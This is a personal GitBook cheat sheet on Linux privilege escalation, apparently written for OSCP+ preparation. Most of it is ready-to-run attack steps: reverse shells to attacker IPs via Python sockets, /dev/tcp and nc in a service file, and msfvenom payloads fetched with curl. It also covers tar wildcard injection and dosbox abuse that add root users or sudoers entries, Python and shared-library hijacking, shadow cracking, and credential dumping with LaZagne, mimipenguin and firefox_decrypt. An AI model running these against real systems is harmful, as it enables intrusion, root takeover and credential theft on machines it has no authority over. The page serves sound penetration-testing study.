Hack-notes
  • Whoami
  • MalDev
    • Reflective loader
  • Academy HackTheBox
    • Attacking Common Applications
      • Attacking Common Applications - Skills Assessment I
      • Attacking Common Applications - Skills Assessment II
      • Attacking Common Applications - Skills Assessment III
    • Attacking Common Services
      • Attacking Common Services - Easy
      • Attacking Common Services - Medium
      • Attacking Common Services - Hard
    • AD Enumeration & Attacks - Skills Assessment Part I
    • AD Enumeration & Attacks - Skills Assessment Part II
  • HackTheBox-writeups
    • Machines
      • Windows
        • Jab
      • Linux
        • ICLEAN
  • Your Path to the OSCP+
    • OSCP+ CheatSheet
      • AD
        • linux
        • Windows
      • Privilege Escalation
        • Linux
        • Windows
      • Payloads (Reverse shell)
      • Persistent
Powered by GitBook
On this page
  • Automated tools
  • Enumeration
  • Config Files
  • Cracking /etc/shadow
  • Wildcard Injection
  • GIT
  • Python
  • OS command injection
  • Module Hijacking
  • Module Overriding
  • Cron jobs
  • Exploiting Cron Jobs – Cron PATH
  • Weak Directory Permissions
  • Exploiting Cron Jobs – tar Wildcard Injection
  • Exploiting Cron Jobs – Hidden Cron Jobs
  • Dumping Memory & Monitoring
  • Abusing /etc/passwd write
  • Browsers
  • firefox
  • Memory and Cache
  • getfacl abuse
  • Doas Abuse
  • dstat
  • Dynamic library hijacking
  • Docker
  • sudo docker exec
  • Mount
  • boot script write permission
  • Tcpdump
  • Path Injection
  • Service Weak permission
  • Disk Group Abuse
  • 7z
  • dosbox
  • resources

Was this helpful?

  1. Your Path to the OSCP+
  2. OSCP+ CheatSheet
  3. Privilege Escalation

Linux

Automated tools

#Where -l1 indicates going one level deeper  
./lse.sh        surface level  
./lse.sh -l1    deep informative scan  
./lse.sh -l2    Very deep scan
#begin with this
./lse.sh -l1

#spawnning a docker container for kernel compiling purposes
sudo systemd-nspawn -M kernel
cd /var/lib/machines/kernel/root #path where the docker container is

Enumeration

#list all files recursive
ls -al -R

#find writable files by our user
find . -writanle

#Enumerate SUID
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null

#enumerate user/group permissions over directories
find / -group user 2>/dev/null |grep -v '^/proc\|^/run\|^/sys'
find / -user user 2>/dev/null |grep -v '^/proc\|^/run\|^/sys'

#enumeraet file name 
find / -type f -name local.txt 2>/dev/null

#enumeraet non empty file and display there content
find . -type f -not -empty -exec cat {} \;

#display env varaibles value
env

cat .bashrc

sudo -l

#list all running process in nice format
ps -ef --forest

#search for the port number keyword in the /etc/ direcotry files
grep '5555' /etc/ -R

watch -n 1 "ps -aux | grep pass"

sudo tcpdump -i lo -A | grep "pass"

#enumerte bash_history
find /home -name .bash_history -exec cat {} \;

#generate custom wordlist
crunch 6 6 -t Lab%%% > wordlist

#enumerating running cron jobs and which user
grep "CRON" /var/log/syslog

#enumerating system Cron jobs
cat /etc/crontab
ls -l /etc/cron*
cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/* /var/spool/cron/* /etc/cron.d/* 2>/dev/null | grep -v "^#"

#enumerate user cron jobs
ls -l /var/spool/cron/crontabs

#find PID of the running process
ps u -C passwd


#use pid if the previous command and check uid
grep Uid /proc/1932/status

#enuemrate capabilities
/usr/sbin/getcap -r / 2>/dev/null

#determine bash users
cat /etc/passwd | grep sh$

#seach for password word in every file, -ie: igone case,pattern matching, 
grep --color=auto -rnw '/' -ie "Password" --color=always 2>/dev/null
grep --color=auto -rnw '/' -ie "passw" --color=always 2>/dev/null
grep --color=auto -rnw '/' -ie "key" --color=always 2>/dev/null
grep --color=auto -rnw '/' -ie "secret" --color=always 2>/dev/null

#search for these keywords
grep -rinE '(password|username|user|pass|key|token|secret|admin|login|credentials)'

#mounted filesystems
mount -l

#enuemrate mounted an unmounted drive
lsblk

#Distribustion and kernel version
cat /etc/issue

#devlopement tools and availability
which gcc
which g++
which python

#Scheduled jobs 
find /etc/cron* -ls 2>/dev/null 
find /var/spool/cron* -ls 2>/dev/null


#search sercice path
systemctl show -p FragmentPath service_name
ls /etc/systemd/system/ | grep trail.service

#if "hidepid=2" we cannot view & interact with users process
cat /etc/fstab

#save ltrace output
ltrace -o output.txt ls

Config Files

# Apache
/etc/apache2/sites-enabled/000-default.conf

#git
.git/config

#joomla
configuration.php

#is a utility for managing and monitoring Unix systems,auto maintenance & reapair
/etc/systemd/system/monit.service

#check if the user have access over ssh
/etc/ssh/sshd_config

#ftp 
/etc/proftpd/sql.conf
/etc/proftpd/proftpd.conf

Cracking /etc/shadow

unshadow passwd shadow > unshadow
john --wordlist=/usr/share/wordlists/rockyou.txt --format=crypt unshadow

#in case we have just shadow file
hashcat -m 1800 -a 0 -o pass.txt aeolusHash.txt -O /usr/share/wordlists/rockyou.txt

Wildcard Injection

Using this method in the folder where the compress happen in the image bellow it's happen in backup folder

#set password hash
openssl passwd password

#Method 1: add second root user named hacker
echo '#!/bin/bash' > /var/www/html/rootme.sh
echo "" >> /var/www/html/rootme.sh 
echo 'echo "hacker:$1$BIkKwugz$pWoxtiVTYB5beTirPNAuA1:0:0:root:/root:/bin/bash" >> /etc/passwd' >> /var/www/html/rootme.sh

#Method 2: add +s in /bin/bash
echo '#!/bin/bash' > rootme.sh
echo "" >> rootme.sh
echo 'chmod +s /bin/bash' >> rootme.sh

#Method 3:
echo "echo 'james ALL=(root) NOPASSWD: ALL' > /etc/sudoers" > ./rootme.sh

#exploit
chmod 755 ./rootme.sh
#create file
touch '/var/www/html/--checkpoint=1'
touch '/var/www/html/--checkpoint-action=exec=sh rootme.sh'

or we can do that instead adding hacker as root

echo 'james ALL=(root) NOPASSWD: ALL' > /etc/sudoers

GIT

config file may contain creds

.git/config

download git repo

wget -r http://target/.git

enumerating all log of git

sudo git log

display all changes of commits

sudo git log -p

Python

OS command injection

Enter some input:   __import__('os').system('id')

Module Hijacking

sudo -l

(root) SETENV: NOPASSWD: /usr/bin/python3 /opt/example.py
import random

print(random.randint(1, 8))
vim /tmp/random.py
import socket,os,pty;s=socket.socket();s.connect(("<local-ip>",4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")
sudo PYTHONPATH=/tmp/ /usr/bin/python3 /opt/example.py

Module Overriding

suppose we notice there is and import module

# example.py
import random

we need to determine if we have write permissions over this module

#search using find command
find / -name "random.py" 2>/dev/null
ls -al /usr/lib/python3.6/random.py

#display where libraries load path
python3 -c 'import sys; print("\n".join(sys.path))'

Python searches for that module in a specific order of directories, which is listed in “sys.path”. “sys.path” is a list of directory paths where Python looks for modules to import. The order in which these directories are listed matters because Python will use the first match it finds. A directory is “world writable” if any user on the system has permission to write files to it (usually indicated by the permission 777). This method is called “Python Library Hijacking”.

# /usr/lib/python3.6/random.py
import os;os.sytem('/bin/bash')

Cron jobs

Exploiting Cron Jobs – Cron PATH

example:

Poc

find / -iname systemctl 2>/dev/null

#enumerate if we have write permession
ls -la /dev | grep "shm"

#we foud 'w' permession, generating a payload to create a malicious systemctl
msfvenom -p linux/x64/shell_reverse_tcp LHOST=172.16.1.30 LPORT=443 -a x64 -f elf -o systemctl

#move malicious systemctl to the path
cd /dev/shm
curl 172.16.1.30/systemctl -o systemctl
chmod 755 ./systemctl

create the payload


#do the same in previous steps and instead payload add this command
echo 'echo "devops ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers' > /dev/shm/systemctl

sudo su

Abusing write crontab


#getting bash with user SUID
cp /bin/bash /tmp && chmod +s /tmp/bash
/tmp/bash -p

Weak Directory Permissions

example


#setting a reverse shell file in the weak directory perm
echo '#!/bin/bash' > /opt/scripts/backup.sh echo "" >> /opt/scripts/backup.sh echo 'bash -i >& /dev/tcp/172.16.1.30/443 0>&1' >> /opt/scripts/backup.sh
chmod 755 /opt/scripts/backup.sh

Exploiting Cron Jobs – tar Wildcard Injection

openssl passwd password

#add second root user named hacker
echo '#!/bin/bash' > /var/www/html/rootme.sh
echo "" >> /var/www/html/rootme.sh 
echo 'echo "hacker:$1$BIkKwugz$pWoxtiVTYB5beTirPNAuA1:0:0:root:/root:/bin/bash" >> /etc/passwd' >> /var/www/html/rootme.sh

chmod 755 ./rootme.sh
#create file
touch '/var/www/html/--checkpoint=1'
touch '/var/www/html/--checkpoint-action=exec=sh rootme.sh'

echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh

Exploiting Cron Jobs – Hidden Cron Jobs

#enuemerate cron daemon running
ps -efw | grep -i "cron"

Hunting for Hidden Cron Jobs Using PsPy

curl 172.16.1.30/pspy64 -o pspy64
chmod 755 ./pspy64
./pspy64
#check permession of the /opt/script
ls -l /opt | grep "scripts"

#move the legitmate script because we don't have per to edit but in the directory we have
mv /opt/scripts/test-connect.sh /dev/shm

#replace it with our
echo '#!/bin/bash' > /opt/scripts/test-connect.sh echo "" >> /opt/scripts/test-connect.sh echo 'cp /bin/bash /tmp && chmod +s /tmp/bash' >> test-connect.sh

/tmp/bash -p

Dumping Memory & Monitoring


#monitor process
ps -ef

dumping memory

ps -eg | grep '<SERVICE_NAME>'
gdb -p <PID>

#list all mapped memory 
info proc mappings

dump memory <OUTPUT_FILE> <START_ADDRESS> <END_ADDRESS>
strings <OUTPUT_FILE> | grep passw

Abusing /etc/passwd write

openssl passwd sekkio123

#or
openssl passwd w00t
echo "root2:Fdzt.eqJQ4s0g:0:0:root:/root:/bin/bash" >> /etc/passwd
su root2

Browsers

firefox

search for mozila folder

cry0l1t3@unixclient:~$ ls -l .mozilla/firefox/ | grep default 

drwx------ 11 cry0l1t3 cry0l1t3 4096 Jan 28 16:02 1bplpd86.default-release
drwx------  2 cry0l1t3 cry0l1t3 4096 Jan 28 13:30 lfx3lvhb.default

decrypting

/opt/firefox_decrypt/firefox_decrypt.py firefox_decrypt.py

Select the Mozilla profile you wish to decrypt
1 -> lfx3lvhb.default
2 -> 1bplpd86.default-release

2

Website:   https://testing.dev.inlanefreight.com
Username: 'test'
Password: 'test'

Website:   https://www.inlanefreight.com
Username: 'cry0l1t3'
Password: 'FzXUxJemKm6g2lGh'

decrypting by specifying the path

 /opt/firefox_decrypt/firefox_decrypt.py ~/Desktop/oscp/PG/mozilla/firefox
Select the Mozilla profile you wish to decrypt
1 -> wqqe31s0.default
2 -> esmhp32w.default-default
2

Website:   https://localhost:10000
Username: 'root'
Password: 'S8Y389KJqWpJuSwFqFZHwfZ3GnegUa'

Memory and Cache

Memory - Mimipenguin

sudo python3 mimipenguin.py
[sudo] password for cry0l1t3: 

[SYSTEM - GNOME]	cry0l1t3:WLpAEXFa0SbqOHY


sudo bash mimipenguin.sh 
[sudo] password for cry0l1t3: 

MimiPenguin Results:
[SYSTEM - GNOME]          cry0l1t3:WLpAEXFa0SbqOHY

An even more powerful tool we can use that was mentioned earlier in the Credential Hunting in Windows section is LaZagne. This tool allows us to access far more resources and extract the credentials. The passwords and hashes we can obtain come from the following sources but are not limited to:

For example, Keyrings are used for secure storage and management of passwords on Linux distributions. Passwords are stored encrypted and protected with a master password. It is an OS-based password manager, which we will discuss later in another section. This way, we do not need to remember every single password and can save repeated password entries.

Memory - LaZagne

cry0l1t3@unixclient:~$ sudo python2.7 laZagne.py all

|====================================================================|
|                                                                    |
|                        The LaZagne Project                         |
|                                                                    |
|                          ! BANG BANG !                             |
|                                                                    |
|====================================================================|

------------------- Shadow passwords -----------------

[+] Hash found !!!
Login: systemd-coredump
Hash: !!:18858::::::

[+] Hash found !!!
Login: sambauser
Hash: $6$wgK4tGq7Jepa.V0g$QkxvseL.xkC3jo682xhSGoXXOGcBwPLc2CrAPugD6PYXWQlBkiwwFs7x/fhI.8negiUSPqaWyv7wC8uwsWPrx1:18862:0:99999:7:::

[+] Password found !!!
Login: cry0l1t3
Password: WLpAEXFa0SbqOHY


[+] 3 passwords have been found.
For more information launch it again with the -v option

elapsed time = 3.50091600418

getfacl abuse

here is a + at the end of the permissions, which means there’s additional ACLs set on the directory

ls -ld /usr/local/monitoring
drwxrwx---+ 2 root root 122 May 14 14:40 /usr/local/monitoring
getfacl /usr/local/monitoring
getfacl: Removing leading '/' from absolute path names
# file: usr/local/monitoring
# owner: root
# group: root
user::rwx
user:michelle:-wx
group::rwx
mask::rwx
other::---
ln -s /etc/passwd test
setfacl -m "u:tanishq:rwx" test
openssl passwd 123
vim test

remove acl

setfacl -b test

Doas Abuse

enumerate does conf

find / -type f -name "doas.conf" 2>/dev/null

check the configuration

doas -C /path/to/doas.conf
doas -C /etc/doas.conf
# or
cat /etc/doas.conf

execute does

doas -u root <command> <arg>
doas /usr/bin/hololo -help

dstat

search i have write over dstat directory

find / -type d -name dstat 2>/dev/null

suppose we have write in /usr/local/share/dstat we can create a plugin with python but we need to add named with the prefix dstat to be like this for example dstat_exploit.py and place in the dstat directory

import os

os.system('chmod +s /usr/bin/bash')

list the plugin exploit to confirm is created or not

dstat --list | grep exploit

get shell as root

/usr/bin/dstat --exploit
bash -p

Dynamic library hijacking

#Check the dynamic libraries that will be loaded when the binary is executed.
ldd /usr/bin/myexec

#Enumerate directories that contain dynamic libraries.
ldconfig -v | grep -v "^"$'\t' | sed "s/:$//g"

Administrators can extend the library search path by specifying additional directories in conf files under "/etc/ld.so.conf.d/".

cat /etc/ld.so.conf.d/*.conf

=> The non-standard directory "/tmp" has been added to the search path

Create a malicious shared library and place it in the /tmp directory to be loaded.

#include <stdlib.h> 
extern int seclogin(); 
int seclogin(){ 
	setreuid(0,0); execve("/bin/bash",NULL,NULL); 
	}

compiling the shared library

gcc -shared -fPIC -o libseclogin.so libseclogin.c
cp libseclogin.so /tmp/libseclogin.so

Docker

sudo docker exec

sudo /snap/bin/docker exec --privileged --user 0 -i -t e6ff5b1cbc85 /bin/bash

Check the disk partition information using the “fdisk -l” command.

bash-5.1# fdisk -l
Disk /dev/xvda: 8192 MB, 8589934592 bytes, 16777216 sectors
6367 cylinders, 85 heads, 31 sectors/track
Units: sectors of 1 * 512 = 512 bytes

Device Boot StartCHS EndCHS StartLBA EndLBA Sectors Size Id Type
/dev/xvda1 * 0,32,33 20,84,31 2048 16777182 16775135 8190M 83 Linux

I created the “/mnt/test” directory and mounted “/dev/xvda1” to the “/mnt/test” directory.

bash-5.1# cd /mnt
bash-5.1# mkdir test
bash-5.1# mount /dev/xvda1 /mnt/test

Finally I was able to get the root flag.

bash-5.1# pwd
/mnt/test/root
bash-5.1# ls
root.txt snap
bash-5.1# cat root.txt

Mount

#enuemrate mounted an unmounted drive
lsblk
#mount sbd with data directory 
sudo mount /dev/sdb /data

boot script write permission

Startups scripts are scripts that are executed at boot time. Linux startup scripts are generally located in /etc/init.d but this location can vary depending on the distribution. For example, you may find startup scripts under these locations: /etc/rc.d, /etc/rc.d/init.d, or /etc/init. These scripts can either be default scripts that are pre-installed, or they can be user created startup scripts.

Tcpdump

#sniff loop back
tcpdump -i lo -w tcpdump.pcap

#display
tcpdump -qns 0 -A -r tcpdump.pcap

Path Injection

support we have curl used in SUID binary without relative path we can abuse it

cd /tmp
echo -n "/bin/bash" > curl
chmod 755 curl
export PATH=/tmp:$PATH
echo $PATH
/opt/statuschecks

Service Weak permission

support we have write on a service and also have reboot in sudo like the images bellow

so let's open pythonapp.service path and edit it

ExecStart=nc 192.168.10.10 80 -e /bin/bash
TimeoutSec=30
RestartSec=600s
User=root

reboot the machine

sudo /sbin/reboot

Disk Group Abuse

df -h

enter debug mode with our disk privileges

debugfs /dev/sda2

We have a new prompt and can move around albeit a bit awkwardly. The change directory command ‘cd’ works just fine and you can list files with ‘ls’ but it will take you to another screen. We can return to our debug prompt by pressing ‘q’. Importantly the cat command works revealing the root SSH key.

7z

suppose we notice this file how can we abuse it?

#!/bin/bash

password=`cat /root/secret`

cd /var/www/html/uploads

rm *.tmp

7za a /opt/backups/backup.zip -p$password -tzip *.zip > /opt/backups/backup.log

by adding @root.txt file which will interpreted as a file contain file named to be compressed and causing the 7z to failed

cd /var/www/html/uploads
touch @root.txt
ln -s /etc/shadow root.txt

cat /opt/backups/backup.log

dosbox

SUID abuse

openssl passwd asd123  
LFILE='/etc/passwd'  
/usr/bin/dosbox -c 'mount c /' -c "echo shatternox:\$1\$ZcfsueEb\$XYBEDdtPACqWJML3/drmC1:0:0:root:/root:/bin/bash >> c:$LFILE" -c exit

#
LFILE='/etc/sudoers'
/usr/bin/dosbox -c 'mount c /' -c "echo commander ALL=(ALL) NOPASSWD: ALL >> c:$LFILE" -c exit

resources

PreviousPrivilege EscalationNextWindows

Last updated 5 months ago

Was this helpful?

Quotation source :

docker exec | Docker Docs
compiling inside a docker container